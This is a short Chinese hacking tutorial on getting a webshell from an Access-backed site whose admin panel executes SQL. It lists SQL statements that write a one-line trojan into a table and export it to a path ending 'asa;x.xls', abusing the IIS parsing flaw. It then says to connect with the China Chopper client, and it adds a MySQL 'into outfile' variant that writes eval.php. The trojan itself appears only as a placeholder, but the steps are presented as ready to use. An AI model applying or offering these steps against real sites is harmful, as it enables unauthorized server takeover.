[Access] Access数据库导出一句话拿shell方法

实用环境，在Access后台其他方法不能拿到webshell

但是后台有SQL语句查询执行，就可以直接access导出一句话拿webshell了

不过需要知道物理路径才能导出，利用IIS的解析漏洞导出EXCEL文件拿到webshell，因为ACCESS数据库不允许导出其他危险格式。

至于怎么拿到物理路径就看你自己发挥了，报错或备份路径等。

逐一执行以下语句就可以导出一句话了

第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('一句话木马')

第三句代码

select * into [a] in 'e:webmumaasp1.asa;x.xls' 'excel 4.0;' from cmd

第四句代码

drop table cmd

然后直接菜刀里连接http://www.mumaasp.com/1.asa;x.xls

SQL语句意思解释：

第一句

建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50

第二句

在表cmd的a字段插入一句话木马

第三句

把cmd表a的内容导出到路径e:webmumaasp的EXCEL文件

第四句

删除建立的cmd表

以下内容为测试：

Access利用后台SQL执行命令功能导出WebShell:

这个更简单：

Select 'asp一句话木马' into [vote] in 'e:webmumaasp1.asa;x.xls' 'excel 8.0;' from vote或者

Select 'php一句话木马' into outfile 'F:/wwwroot/mumaasp.com/eval.php';

后台有执行SQL语句功能(vote为已知表段)